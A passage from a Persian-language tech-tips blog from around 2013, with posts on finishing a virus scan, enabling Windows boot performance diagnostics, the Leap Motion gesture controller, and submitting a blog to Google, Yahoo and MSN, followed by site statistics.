6 - حالا با خیال راحت با یک آنتی ویروس آپدیت شده (ترجیحا Nod32 را یا کسپرسکی) کل هارد دیسک، فلش و حافظه های جانبی خود را اسکن کنید تا سیستم خود را از شر این ویروس های مخفی و هوشمند به طور کامل پاک کنید! ضمنا پس از پایان اسکن و یافتن و پاک کردن ویروس ها دوباره تنظیمات قبلی را به حالت اول برگردانید.

+ نوشته شده در  سه شنبه بیست و ششم دی 1391ساعت 16:55  توسط زهرا بیات  |  نظر بدهید

 

افزایش سرعت بالا آمدن ویندوز ویستا و 7 با انجام یک تنظیم ساده

یکی از مشکلات شایع در سیستمهای تحت ویندوز، کند بودن سرعت بالا آمدن و راهاندازی آن است. به طوری که پس از روشن کردن سیستم، زمان زیادی صرف ورود به ویندوز و بارگذاری کامل صفحه دسکتاپ میشود. این موضوع در کامپیوترهای قدیمی و سیستمهایی که دارای نرمافزارهای نصب شده زیادی هستند بیشتر به چشم میخورد. بسیاری از کاربران برای حل این مشکل از طریق تنظیمات msconfig را به خالی کردن برنامههای اجرا شده در Startup را میپردازند. این راه مفید است اما همواره نمیتواند کافی باشد. در صورتی که از ویندوز ویستا یا 7 استفاده میکنید و با این مشکل روبرو هستید، بایستی بدانید در این دو ویندوز قابلیتی به نام بوت ویندوز عملکرد تشخیص نفهته است که بسیاری از کاربران از آن بیخبرند. با فعال نمودن این ابزار، ویندوز به طور اتوماتیک موانعی که باعث کاهش سرعت بالا آمدن ویندوز میشود را به طور اتوماتیک تشخیص داده و آنها را رفع میکند. در این ترفند قصد داریم به معرفی این قابلیت مفید بپردازیم.


 

برای این کار: 
ابتدا در منوی شروع عبارت gpedit.msc را را وارد کرده و وارد کنید بزنید 
در پنجره ویرایشگر گروه محلی سیاست از پنل سمت چپ مسیر زیر را طی کنید:

پیکربندی کامپیوتر> قالب های اداری> سیستم> عیب یابی و تشخیص> بوت ویندوز تشخیص عملکرد

اکنون از قسمت سمت راست پنجره، بر روی پیکربندی سناریو در سطح اجرا دوبار کلیک کنید. 
در پنجره جدید، گزینه فعال را انتخاب نمایید. همچنین اطمینان پیدا کنید در قسمت سناریو اجرای سطح گزینه تشخیص، عیب یابی و وضوح تصویر در حالت انتخاب باشد. 
اکنون بر روی دکمه OK کلیک کنید. 
حال ویندوز را یکبار راه اندازی مجدد نمایید. 
اکنون عملکرد بوت ویندوز تشخیص فعال بوده و به تشخیص و حل مشکلاتی که باعث کندی بالا آمدن ویندوز میشود میپردازد.

دقت نمایید برای این که ویندوز بوت عملکرد تشخیص به درستی کار کند، بایستی سرویس (خدمات تشخیصی سیاست (DPS در محیط ویندوز فعال باشد برای اطمینان این قضیه: 
. در منوی شروع عبارت خدمات را تایپ کرده و وارد کنید بزنید 
در پنجره باز شده تشخیصی سرویس سیاست را یافته و اطمینان پیدا کنید وضعیت (STATUS) آن بر روی آغاز شده قرار گرفته است.

مجیدقزوین بازدید : 14 جمعه 29 دی 1391 نظرات (0)

 در آینده ای نزدیک شما با استفاده از آن دیگر نیازی به استفاده از کیبورد ، موس و حتی تاچ اسکرین نخواهید داشت. شما فقط می بایستی انگشتتان را در هوا حرکت دهید ، این قطعه ی کوچک با دقت رد دست شما را دنبال می کند و برروی نمایشگر نمایش می دهد. این دستگاه تقریبا شبیه کینکتمایکروسافت است اما خیلی از آن بهتر است. Leap Motion ادعا می کند که این دستگاه ۲۰۰ مرتبه دقیق تر از هرچیزی در بازار است و می تواند حرکات انگشت را با دقت ۱/۱۰۰ میلیمتر دنبال کند.

 

شما فقط می بایستی انگشتتان را در هوا حرکت دهید ، این قطعه ی کوچک با دقت رد دست شما را دنبال می کند و برروی نمایشگر نمایش می دهد

ورژن اولیه این دستگاه به اندازه ی توپ هاکی است که به لپ تاپ یا کامپیوتر شما متصل می شود. صادرات این قطعه ی کوچک از سال ۲۰۱۳ با قیمتی باورنکردنی (۶۹٫۹۹ دلار) استارت خواهد خورد.

Leap Motion با پیش فروش این دستگاه ، سفارشی به ارزش ده ها میلیون دلار دریافت کرده است.

برای شروع به کار این دستگاه ، فقط برای لپ تاپ و کامپیوتر عرضه خواهد شد اما این کمپانی اعلام کرد که می خواهد دامنه ی کار خود را گسترش دهد و دستگاه هایی برای گجت های دیگر هم روانه بازار کند. آنها در افق های بلند خود پتانسیل فوق العاده ای برای این دستگاه در نظر گرفته اند و قصد دارد از آنها در ربات های جراح ، ربات های کارگر و آشپزخانه فست فودها استفاده کنند.

مجیدقزوین بازدید : 16 جمعه 29 دی 1391 نظرات (0)

یک کارشناس نرم‌افزار هشدار داد: حتی‌الامکان از دکمه Reset یا کلید Power روی کیس رایانه برای خاموش کردن یا راه‌اندازی مجدد سیستم استفاده نشود.

به گزارش پایگاه خبری فناوری اطلاعات و به نقل از دنیای اقتصاد، معمولا اغلب خریداران رایانه در همان هفته اول خرید، مجبور می‌شوند برای تعمیر یا رفع عیب آن مجددا به فروشنده مراجعه کنند و باید گفت که نکاتی وجود دارد که می‌تواند برای رفع این مشکلات موثر باشد.

 

مجیدقزوین بازدید : 20 جمعه 29 دی 1391 نظرات (0)
 با عرض سلام خدمت خوانندگان محترم وبلاگ، در این مطالب می خوام چگونگی ثبت وبلاگ یا سایت رو در 3 متور جستجوگر قوی ارائه خوام کرد. یکی از مهمترین عملیات های برای افزایش بازدید و سهم در موتور های جستجو ؛ برای وبلاگ ها و سایت ها ، معرفی آنها به موتور های جستجوست ! 1. معرفی وبلاگ + سایت به گوگل چگونه سایت خود را به گوگل معرفی کنیم تا سهم بیشتری در جستجوی کلمات در موتور جستجوی گوگل داشته باشیم؟ اینکار بسیار آسان است. http://www.google.com/addurl.html » بعد از کلیک بر روی لینک بالا شما وارد صفحه ی اضافه کردن آدرس به گوگل خواهید شد. » در قسمت میانی صفحه، بخش زیر را مشاهده خواهید نمود. » همانگونه که مشخص شده است. در قسمت URL آدرس سایت یا وبلاگ خود را وارد کرده و در قسمت Comments هم توضیحاتی در مورد وبلاگ و یا سایت خود را وارد می کنید. در آخر کد یا نوشته یا اعدادی که در عکس پایین سایت را میبینید را درون کادر مشخص شده وارد می کنید و کلید Add URL را می زنید.

 

2. معرفی وبلاگ + سایت به یاهو چگونه سایت خود را به یاهو معرفی کنیم تا سهم بیشتری در جستجوی کلمات در موتور جستجوی یاهو داشته باشیم؟ اینکار بسیار آسان است. http://submit.search.yahoo.com/free/request » برای معرفی وبلاگ یا سایت خود به جستجو گر یاهو باید یک ایمیل در یاهو داشته باشید. » بعد از کلیک بر روی لینک بالا شما وارد صفحه ی اضافه کردن آدرس به جستجوگر یاهو خواهید شد. همانگونه که بر روی تصویر نیز مشخص شده است در قسمت Submit a Website or Webpage آدرس وبلاگ یا سایت خود را وارد کنید. *-*-*چنانچه شما در یاهو لاگین نباشید - یا به عبارت ساده تر اگر در هنگام کلیک کردن دگمه ی بالا مسنجر شما باز نباشد و یا بخش مدیریت ایمیل یاهوی شما باز نباشد - بعد از کلیک کردن بر روی دگمه ی بالا ، صفحه ی درخواست ایمیل و رمز شما در یاهو ظاهر خواهد شد و شما باید مشخصات خود را وارد کنید با ورد کردن مشخصات، وبلاگ شما در فهرست صفحات یاهو ثبت می شود و پیام زیر نیز ظاهر میشود. همچنین شما می توانید وبلاگ یا سایت خود را از طریق Rss یا همان فید نیز به یاهو معرفی کنید.

3. معرفی وبلاگ + سایت به msn چگونه سایت خود را به msn معرفی کنیم تا سهم بیشتری در جستجوی کلمات در موتور جستجوی msn داشته باشیم؟ اینکار بسیار آسان است. http://search.msn.com/docs/submit.asp برای انجام این کار زحمت زیادی نخواهید داشت، تنها لازم است صفحه ی مربوط را باز کنید و مطابق تصویر کد درون تصویر را وارد کنید و در بخش مربوط به آدرس هم آدرس کامل وبلاگ یا سایت خود را بنویسید و بر روی دگمه ی Submit URL کلیک کنید .


*توجه         توجه*

 دوستان جهت سهولت در امر ثبت وبلاگ در وتورهای جستجو گر می توانید بر روی هر یک از لینک های زیر کلیک کنید و وبلاگ یا وبسایت خود را  در 150 متور جستجوگر بصورت اتوماتیک ثبت نمایید.

لینک 1:ثبت وبلاگ در 150 موتور جستوجوگر

لینک 2:ثبت وبلاگ در 150موتور جستوجوگر

 

مجیدقزوین بازدید : 26 جمعه 29 دی 1391 نظرات (0)

یکی از مشکلات متداول کامپیوترها، به خصوص سیستم‌عامل ویندوز، کند شدن سیستم به دلایل مختلف و در طول زمان است. در این مقاله علاوه بر بررسی علل وقوع چنین مشکلی، به رفع مشکلات سرعت پایین کامپیوتر می‌پردازیم.    .....

 

مجیدقزوین بازدید : 26 یکشنبه 24 دی 1391 نظرات (0)

\ دیگر کمتر کسی را می یابد که  یک فلش مموری در جیبش نباشد ! طبیعی است با زیاد شدن استفاده از یک وسیله ، مشکلات آن نیز یکی یکی پدیدار خواهد شد . ویروسی شدن فلش مموری و همچنین دسترسی آسان همه اشخاص به آن را میتوان از چندین مشکل این وسیله نام برد . در این مطلب محور اصلی ما دسترسی آسان همه به فلش مموری شماست . طوری که اگر شما فلش مموری خود را گم کنید ، هر شخصی با اتصال آن به سیستم خود میتواند به اطلاعات آن دست پیدا کند . یا اگر آن را در محلی جا بگذارید ، بازهم این موضوع صدق می کند. راه حل چیست؟

عضویت در سایت

عضویت

تعداد صفحات : 3

اطلاعات کاربری
  • فراموشی رمز عبور؟
  • آرشیو
    آمار سایت
  • کل مطالب : 1528
  • کل نظرات : 9
  • افراد آنلاین : 3
  • تعداد اعضا : 19
  • آی پی امروز : 122
  • آی پی دیروز : 75
  • بازدید امروز : 166
  • باردید دیروز : 200
  • گوگل امروز : 0
  • گوگل دیروز : 0
  • بازدید هفته : 166
  • بازدید ماه : 908
  • بازدید سال : 23,852
  • بازدید کلی : 77,275